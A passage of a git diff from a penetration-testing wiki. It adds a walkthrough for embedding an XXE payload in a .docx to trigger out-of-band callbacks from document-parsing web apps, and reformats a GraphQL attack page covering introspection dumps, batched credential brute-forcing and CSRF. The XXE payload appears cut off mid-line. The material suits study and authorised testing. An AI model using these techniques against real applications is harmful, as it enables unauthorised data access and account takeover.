documents, and then they parse some details out of them. For example, you might have a web application that allows you to import data by uploading a spreadsheet in XLSX format. At some point, in order for the parser to extract the data from the Spreadsheet, the parser is going to need to **parse at least one XML file**. + +The only way to test for this is to generate a **Microsoft Office file that contains an XXE payload**, so let’s do that. First, create an empty directory to unzip your document to, and unzip it! + +```text +test$ ls +test.docx +test$ mkdir unzipped +test$ unzip ./test.docx -d ./unzipped/ +Archive: ./test.docx + inflating: ./unzipped/word/numbering.xml + inflating: ./unzipped/word/settings.xml + inflating: ./unzipped/word/fontTable.xml + inflating: ./unzipped/word/styles.xml + inflating: ./unzipped/word/document.xml + inflating: ./unzipped/word/_rels/document.xml.rels + inflating: ./unzipped/_rels/.rels + inflating: ./unzipped/word/theme/theme1.xml + inflating: ./unzipped/[Content_Types].xml +``` + +Open up `./unzipped/word/document.xml` in your favourite text editor \(vim\) and edit the **XML to contain your favourite XXE payload**. The first thing I try tends to be a HTTP request, like this: + +```text + ]> +&test; +``` + +Those lines should be inserted in between the two root XML objects, like this, and of course you will need to replace the URL with a URL that you can monitor for requests: + +![Those lines should be inserted in between the two root XML objects, like thi](https://labs.detectify.com/wp-content/uploads/2021/09/xxe-obscure.png) + +All that is left is to **zip the file up to create your evil poc.docx file**. From the “unzipped” directory that we created earlier, run the following: + +![From the "unzipped" directory that we created earlier, run the following:](https://labs.detectify.com/wp-content/uploads/2021/09/xxe-unzipped.png) + +Now upload the file to your \(hopefully\) vulnerable web application and pray to the hacking gods for a request in your Burp Collaborator logs. + ### Jar: protocol The `jar` protocol is only available on **Java applications**. It allows to access files inside a **PKZIP** file \(`.zip`, `.jar`, ...\) and works for local and remote files: diff --git a/pentesting/pentesting-web/graphql.md b/pentesting/pentesting-web/graphql.md index becd73ca..6edd3083 100644 --- a/pentesting/pentesting-web/graphql.md +++ b/pentesting/pentesting-web/graphql.md @@ -16,7 +16,7 @@ When performing your directory brute force attacks make sure to add the followin * _/graphql/console_ Once you find an open graphQL instance you need to know what queries it supports. This can be done by using the introspection system, more details can be found here: [**GraphQL: A query language for APIs.** -_It’s often useful to ask a GraphQL schema for information about what queries it supports. GraphQL allows us to do so…_graphql.org](https://graphql.org/learn/introspection/) +\_It’s often useful to ask a GraphQL schema for information about what queries it supports. GraphQL allows us to do so…\_graphql.org](https://graphql.org/learn/introspection/) ### Basic Enumeration @@ -74,7 +74,7 @@ Note that the type of the query "_flags_" is "_Flags_", and this object is defin ![](../../.gitbook/assets/screenshot-from-2021-03-13-18-22-57.png) -You can see that the "_Flags_" objects are composed by **name** and .**value** Then you can get all the names and values of the flags with the query: +You can see that the "_Flags_" objects are composed by **name** and .**value** Then you can get all the names and values of the flags with the query: ```javascript query={flags{name, value}} @@ -164,7 +164,7 @@ You can also **search several objects at the same time**. In this case, a search }r ``` -Or even **relations of several different objects using aliases**: +Or even **relations of several different objects using aliases**: ```javascript { @@ -242,7 +242,6 @@ mutation { } } } - ``` ### Batching brute-force in 1 API request @@ -254,8 +253,6 @@ Below you can find the simplest demonstration of an application authentication r ![](../../.gitbook/assets/image%20%28245%29.png) - - As we can see from the response screenshot, the first and the third requests returned _null_ and reflected the corresponding information in the _error_ section. The **second mutation had the correct authentication** data and the response has the correct authentication session token. ![](../../.gitbook/assets/image%20%28119%29.png) @@ -268,7 +265,7 @@ If you don't know what CSRF is read the following page: Out there you are going to be able to find several GraphQL endpoints **configured without CSRF tokens.** -Note that GraphQL request are usually sent via POST requests using the Content-Type **`application/json`**. +Note that GraphQL request are usually sent via POST requests using the Content-Type **`application/json`**. ```javascript {"operationName":null,"variables":{},"query":"{\n user {\n firstName\n __typename\n }\n}\n"} @@ -282,7 +279,7 @@ query=%7B%0A++user+%7B%0A++++firstName%0A++++__typename%0A++%7D%0A%7D%0A Therefore, as CSRF requests like the previous ones are sent **without preflight requests**, it's possible to **perform** **changes** in the GraphQL abusing a CSRF. -However, note that the new default cookie value of the `samesite` flag of Chrome is `Lax`. This means that the cookie will only be sent from a third party web in GET requests. +However, note that the new default cookie value of the `samesite` flag of Chrome is `Lax`. This means that the cookie will only be sent from a third party web in GET requests. Note that it's usually possible to send the **query** **request** also as a **GET** **request and the CSRF token might not being validated in a GET request.** @@ -294,23 +291,23 @@ For more information **check the** [**original post here**](https://blog.doyense ### Clients -{% embed url="https://github.com/graphql/graphiql" %} +{% embed url="https://github.com/graphql/graphiql" caption="" %} -{% embed url="https://github.com/swisskyrepo/GraphQLmap" %} +{% embed url="https://github.com/swisskyrepo/GraphQLmap" caption="" %} -{% embed url="https://altair.sirmuel.design/" %} +{% embed url="https://altair.sirmuel.design/" caption="" %} -{% embed url="https://blog.doyensec.com/2020/03/26/graphql-scanner.html" %} +{% embed url="https://blog.doyensec.com/2020/03/26/graphql-scanner.html" caption="" %} -{% embed url="https://github.com/doyensec/inql" %} +{% embed url="https://github.com/doyensec/inql" caption="" %} -{% embed url="https://altair.sirmuel.design/" %} +{% embed url="https://altair.sirmuel.design/" caption="" %} -{% embed url="https://gitlab.com/dee-see/graphql-path-enum" %} +{% embed url="https://gitlab.com/dee-see/graphql-path-enum" caption="" %} ### Automatic Tests -{% embed url="https://graphql-dashboard.herokuapp.com/" %} +{% embed url="https://graphql-dashboard.herokuapp.com/" caption="" %} * Video explaining AutoGraphQL: [https://www.youtube.com/watch?v=JJmufWfVvyU](https://www.youtube.com/watch?v=JJmufWfVvyU) diff --git a/windows/active-directory-methodology/README.md b/windows/active-directory-methodology/README.md index eba183b1..1b96a850 100644 --- a/windows/active-directory-methodology/README.md +++ b/windows/active-directory-methodology/README.md @@ -402,7 +402,7 @@ If you don't execute this from a Domain Controller, ATA is going to catch you, s * [Python script to enumerate active directory](https://github.com/ropnop/windapsearch) * [Python script to enumerate active directory](https://github.com/CroweCybersecurity/ad-ldap-enum) -![](../../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%2812%29.png) +![](../../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%2813%29.png) ​[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop) diff --git a/windows/checklist-windows-privilege-escalation.md b/windows/checklist-windows-privilege-escalation.md index c278353a..410f873f 100644 --- a/windows/checklist-windows-privilege-escalation.md +++ b/windows/checklist-windows-privilege-escalation.md @@ -126,7 +126,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book. Don't forget to **give ⭐ on the github** to motivate me to continue developing this book. -![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%284%29.png) +![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%285%29.png) ​[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*